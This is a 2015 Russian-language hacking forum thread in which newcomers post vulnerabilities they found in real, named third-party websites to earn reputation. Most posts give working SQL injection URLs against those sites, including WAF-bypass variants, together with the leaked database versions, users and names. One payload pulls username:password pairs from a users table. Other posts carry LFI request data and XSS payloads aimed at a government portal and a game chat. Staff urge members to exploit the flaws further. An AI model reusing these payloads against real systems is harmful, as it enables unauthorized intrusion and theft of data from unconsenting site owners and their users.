Уязвимости SQLi, XSS и другие.

Discussion in 'Песочница' started by Егорыч+++, 10 May 2015.

  1. Егорыч+++

    Staff Member

    Joined:
    27 May 2002
    Messages:
    1,373
    Likes Received:
    895
    Reputations:
    20
    Эта тема только для публикации уязвимостей найденным вами лично. Любая честно найденная уязвимость прибавляет вам репутации. Тема исключительно для вновь прибывших.

    Перед постом проверяйте, не выкладывалась ли уже найденная вами уязвимость. сделать это можно так:
    Google:
    Code:
    site:antichat.ru ваш_сайт_с_уязвимостью.ру
    Не забывайте, что необходимо написать эксплоит с выводом для SQLi, для XSS вывести alert(), для LFI прочитать /etc/passwd и т. п.

     
    #1 Егорыч+++, 10 May 2015
    Last edited by a moderator: 31 May 2015
    CyberTro1n and Mister_Bert0ni like this.
  2. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,063
    Likes Received:
    1,559
    Reputations:
    40
    Два http://www.webbonus.net.ua/bitcoin-s.php?sait=-10'+/*!12345union*/+/*!12345select*/ 1,2,3,4,5,6,7,8,database/*AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA*/(),10+--+ '-
    Кстати , тут WAF и я заюзал технику буфер оверфлов П.С нигде я не нашёл на эту тему статей и очень мало мануалов про обход WAF итд .
     
  3. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,063
    Likes Received:
    1,559
    Reputations:
    40
    Три lfi

    http://greyslon.ru/index.php

    post
    action=register
    &ajax=true
    &data=login%3De%26email%3De%26pass%3De%26repass%3De%26payeer%3De%26captcha%3De
    &page=../info
    Ещё это http://greyslon.ru/htaccess Не знаю уязвимость это или нет чтение этого файла
     
  4. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,063
    Likes Received:
    1,559
    Reputations:
    40
    bidderland.co.in/siteadmin
    Эта уязвимость эксплуатируется за 5 секунд.
    нашёл не я , но она очень интересная, не типичная. Кто догнал прошу оставить это в секрете.
     
    Bezlishke and Mister_Bert0ni like this.
  5. WallHack

    WallHack Elder - Старейшина

    Joined:
    18 Jul 2013
    Messages:
    306
    Likes Received:
    138
    Reputations:
    33
    А что не раскрутил ?
    Code:
    http://www.c2-int.com/news-full.php?id=-1278+union+select+1,2,3,version(),5,6,7,8,9,10,11,12,13,14+--+
    Версия: 5.5.43-37.2
    User: c2deuts_ice@localhost
    -----------------------------
    Зачем делать несколько постов можно в одном все выложить
     
    #5 WallHack, 10 May 2015
    Last edited: 10 May 2015
  6. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    920
    Reputations:
    862
    Раскручивайте уязвимости. Пытайтесь придумать вектор атаки. Мы вас не для этого отбираем, чтобы вы просто умели что-то искать.
     
    _________________________
    Take_IT and yarbabin like this.
  7. frank

    frank Member

    Joined:
    8 May 2015
    Messages:
    200
    Likes Received:
    96
    Reputations:
    28
    HTML:
    http://www.asep7.gov.la/show.php?id=15%27+and+12=16+union+select+1,2,3,4,version%28%29,6,7,8,9,10,11,12+--+
    5.5.40-0ubuntu0.12.04.1 - вывод в заголовке

    HTML:
    http://www.minddesign.co.uk/show.php?id=483%27+and+34=-2+union+select+1,2,3,version%28%29,5,6,7,8,9,10,11,12,13,14,15,16+--+
    5.6.23

    HTML:
    http://www.psych-it.com.au/Psychlopedia/article.asp?id=277+AND+568=-3+union+select+1,concat%28username,0x3a,pass%29,3,4,5,6+from+users+limit+10,1+--+
    4.1.18-nt
     
  8. frank

    frank Member

    Joined:
    8 May 2015
    Messages:
    200
    Likes Received:
    96
    Reputations:
    28
    HTML:
    http://www.damico.co.za/staff_profile.asp?STAFF_ID=3+and+12=0+union+select+1,user%28%29,database%28%29,version%28%29,5+--+
    [email protected]
    idserver_damicodb
    5.5.42-cll
     
  9. Mister_Bert0ni

    Mister_Bert0ni Reservists Of Antichat

    Joined:
    10 May 2015
    Messages:
    142
    Likes Received:
    190
    Reputations:
    57
    http://goo.gl/imjzsb
    http://goo.gl/8IKVeV
    http://goo.gl/wYRBLz

    http://emofans.ru/gallery/emowallp/
    POST_DATA:
    foto_msort=&foto_sort=null and ++POLYGON((select*from(select*from(select+concat(0x7e7e496e6a6563746564204279204d69737465725f42657274306e697e7e,0x203a3a204461746162617365203a3a ,database(),0x202056657273696f6e203a3a20,version())e)f)x)) -- -



    https://www.choosewellness.com.ph/campus-vote_video-entry.php?id=5 and(select!x-~0.+from(select(select+group_concat(0x3c7370616e207374796c653d22666f6e742d66616d696c793a4963656c616e643b636f6c6f723a7265643b73697a653a353b746578742d736861646f773a23303030203070782030707820337078223e4d69737465725f42657274306e693c62723e,0x4461746162617365203a3a202020,DATABASE(),0x3c62723e506f727420203a3a2020,@@PORT,0x3c62723e46696c6573797374656d203a3a2020,@@VERSION_COMPILE_OS,0x20203a3a2020,@@VERSION_COMPILE_MACHINE,0x3c62723e56657273696f6e206f66204461746162617365203a3a2020,version(),0xa3c62723e486f73746e616d65203a3a20,@@HOSTNAME,0x3c2f7370616e3e))x)x)
     
    #9 Mister_Bert0ni, 10 May 2015
    Last edited: 11 May 2015
    papaher and BabaDook like this.
  10. Mister_Bert0ni

    Mister_Bert0ni Reservists Of Antichat

    Joined:
    10 May 2015
    Messages:
    142
    Likes Received:
    190
    Reputations:
    57
    Демонстрация SQLi от меня
     
    Шниперсон and kostea like this.
  11. Mister_Bert0ni

    Mister_Bert0ni Reservists Of Antichat

    Joined:
    10 May 2015
    Messages:
    142
    Likes Received:
    190
    Reputations:
    57
    Демонстрация SQLi от меня
     
    Шниперсон and Dondo like this.
  12. Mister_Bert0ni

    Mister_Bert0ni Reservists Of Antichat

    Joined:
    10 May 2015
    Messages:
    142
    Likes Received:
    190
    Reputations:
    57
    SQLi на сайте bitbank
     
    Шниперсон and Dondo like this.
  13. Mister_Bert0ni

    Mister_Bert0ni Reservists Of Antichat

    Joined:
    10 May 2015
    Messages:
    142
    Likes Received:
    190
    Reputations:
    57
    Да да 5 сек даже много)))
     
  14. rezistor

    rezistor New Member

    Joined:
    11 May 2015
    Messages:
    3
    Likes Received:
    2
    Reputations:
    1
  15. Arboretum

    Arboretum Member

    Joined:
    8 May 2015
    Messages:
    7
    Likes Received:
    8
    Reputations:
    0
    http://java.lordy.ru/
    Есть жаба игра, зарегавшись, в чате можно написать "><script>alert(XSS)</script>", после этого на java.lordy.ru высветится XSS.
     
    qwaszx000 and fazernotinworld like this.
  16. frank

    frank Member

    Joined:
    8 May 2015
    Messages:
    200
    Likes Received:
    96
    Reputations:
    28
    HTML:
    http://www.jhewlett.com/content/humor.php?id=10%27+and+1=-0+union+select+user%28%29,group_concat%28database%28%29,0x3a,version%28%29%29+--+
    [email protected]
    jhewlett_prod:5.0.96-log

    HTML:
    http://nightgallery.ca/event.php?id=91+or+1+group%20by%20concat_ws%280x2a,version%28%29,user%28%29,database%28%29,floor%28rand%280%29*2%29%29%20having%20min%280%29%20or%201--+
    5.0.96-log
    [email protected]
    nightgallery20

    HTML:
    http://www.australianpaddlesurfer.com.au/review.php?id=113+or+2+group%20by%20concat_ws%280x2f,version%28%29,user%28%29,database%28%29,floor%28rand%280%29*2%29%29%20having%20min%280%29%20or%201--+
    10.0.17-MariaDB-cll-lve
    [email protected]4.au.syr

    HTML:
    http://www.novagora.net/rub.php?Rub=0&IDR=5+and+2=0+union+select+1,2,concat_ws%280x3a,version%28%29,database%28%29,user%28%29%29,4,5+--+
    4.0.26-standard-log
    novagoraTest
    [email protected]
     
  17. Zen1T21

    Zen1T21 Member

    Joined:
    13 Jan 2013
    Messages:
    158
    Likes Received:
    37
    Reputations:
    2
  18. tiger_x

    tiger_x New Member

    Joined:
    9 May 2015
    Messages:
    27
    Likes Received:
    2
    Reputations:
    7
    HTML:
    http://www.oar.org.ro/press.php?id=-1%20union%20all%20select%20null,null,null,version%28%29,null,null%20--
    Версия: 5.6.23
    User: oarorgro_oar@localhost
     
  19. rezistor

    rezistor New Member

    Joined:
    11 May 2015
    Messages:
    3
    Likes Received:
    2
    Reputations:
    1
    XSS :)
    http://gov.cap.ru/?__VIEWSTATE=/wEPDwUKLTczMDc3ODY5Nw9kFgJmD2QWAgIDD2QWEgIBD2QWAgIBD2QWAgIBDxYCHgRUZXh0BXLQp9GD0LLQsNGI0YHQutCw0Y8g0YDQtdGB0L/Rg9Cx0LvQuNC60LAgPGRpdj7QntGE0LjRhtC40LDQu9GM0L3Ri9C5INC/0L7RgNGC0LDQuyDQvtGA0LPQsNC90L7QsiDQstC70LDRgdGC0Lg8L2Rpdj5kAgMPZBYOAgEPDxYCHgdWaXNpYmxlaGRkAgMPDxYCHwFoZBYCZg8PFgIeC05hdmlnYXRlVXJsBTpodHRwOi8vZ292LmNhcC5ydS9Pcmdhbml6YXRpb24uYXNweD9nb3ZfaWQ9NDkmdW5pdD1jb250YWN0ZGQCBQ8PFgIfAWhkFgJmDw8WAh8CBSpodHRwOi8vZ292LmNhcC5ydS9TdHJ1Y3R1cmUuYXNweD9nb3ZfaWQ9NDlkZAIJDw8WAh8BZ2QWAmYPFgIeBGhyZWYFMmh0dHA6Ly9nb3YuY2FwLnJ1L1NpdGVNYXAuYXNweD9pZD0zNjU0NzcmZ292X2lkPTQ5ZAILDw8WAh8CBShodHRwOi8vZ292LmNhcC5ydS9TaXRlTWFwLmFzcHg/Z292X2lkPTQ5ZGQCDQ8PFgIfAgUtaHR0cDovL2dvdi5jYXAucnUvc3BlYy9EZWZhdWx0LmFzcHg/Z292X2lkPTQ5ZGQCDw8PFgIfAgUmaHR0cDovL2dvdi5jYXAucnUvcnNzLz9nb3ZfaWQ9NDkmaWQ9NDlkZAIHD2QWBgIDDw8WAh8BZ2RkAgUPDxYCHwFnZGQCFQ8PFgIfAWdkZAINDw8WAh8BZ2RkAhEPDxYCHwFoZGQCEw9kFhoCAQ9kFgICAQ8PFgIfAgUcaW5mby5hc3B4P2dvdl9pZD00OSZ0eXBlPXRvcGRkAgMPZBYCAgEPDxYCHwIFHWluZm8uYXNweD9nb3ZfaWQ9NDkmdHlwZT1tYWluZGQCBQ9kFgICAQ8PFgIfAgUdaW5mby5hc3B4P2dvdl9pZD00OSZ0eXBlPW5ld3NkZAIHDw8WAh8BaGRkAgkPZBYCAgEPDxYCHwIFFHZpZGVvLmFzcHg/Z292X2lkPTQ5ZGQCCw8PFgIfAWhkZAINDw8WAh8BaGQWAgIBDw8WAh8CBRdjYWxlbmRhci5hc3B4P2dvdl9pZD00OWRkAg8PZBYCAgEPDxYCHwIFGlB1YmxpY2F0aW9uLmFzcHg/Z292X2lkPTQ5ZGQCEQ9kFgICAQ8PFgIfAgUYTWVtb3JpYWxzLmFzcHg/Z292X2lkPTQ5ZGQCEw8PFgIfAWhkZAIVD2QWAgIBDw8WAh8CBRNsYXdzLmFzcHg/Z292X2lkPTQ5ZGQCFw8PFgIfAWhkZAIZDw8WAh8BaGRkAhUPDxYCHwFoZGQCFw8PFgIfAWdkZAIbD2QWAgIBDw8WAh8CBSZPcmdzLmFzcHg/Z292X2lkPTQ5JmlkPTQ5JnVuaXQ9Y29udGFjdGRkZP3Mf6N7ALxvhcyia+88BzPuA4FLR9eN77dXGFDCRBD/&ctl00$Search1$BtnSearch=&__VIEWSTATEGENERATOR=CA0B0334&ctl00$Search1$TextSearch=античат<script>alert()</script>&__EVENTVALIDATION=/wEWBwK1y/X1DALNk6LCAwKbnsfFCAK8lLmCCQLC9M+dCwKC1JS2BwKjz9/DAXkyh+c6G8rMsfjzrV2Wjy6zi7nnNfiqJHMfqPO+S6mI&ctl00$Comments=античат&ctl00$ErrorText=
     
    Mister_Bert0ni likes this.
  20. Mister_Bert0ni

    Mister_Bert0ni Reservists Of Antichat

    Joined:
    10 May 2015
    Messages:
    142
    Likes Received:
    190
    Reputations:
    57
    http://goo.gl/uMgvlO
    Code:
    http://www.perio.com.ua/articles.php?id=.13 and @b:=current_user()+/*!50000UNIoN+Select*/+1,concat/*_*/(0x3c7370616e207374796c653d22666f6e742d66616d696c793a4963656c616e643b636f6c6f723a7265643b73697a653a353b746578742d736861646f773a23303030203070782030707820337078223e4d69737465725f42657274306e693c62723e,0x4461746162617365203a3a202020,DATABASE/**_**/(),0x3c62723e506f727420203a3a2020,@@port,0x3c62723e43757272656e745f55736572203a3a202020203a3a  ,@b,0x3c62723e56657273696f6e206f66204461746162617365203a3a2020,VERSION(),0xa3c62723e486f73746e616d65203a3a20,0x3c2f7370616e3e,@@HOSTNAME),3,1337,5,6 -- -
    
    Может кто знает как здесь WAF на information_schema обойти?
     
    #20 Mister_Bert0ni, 11 May 2015
    Last edited: 12 May 2015
Loading...
Similar Threads - Уязвимости SQLi
  1. zase
    Replies:
    1
    Views:
    3,547
  2. Shadows_God
    Replies:
    14
    Views:
    8,063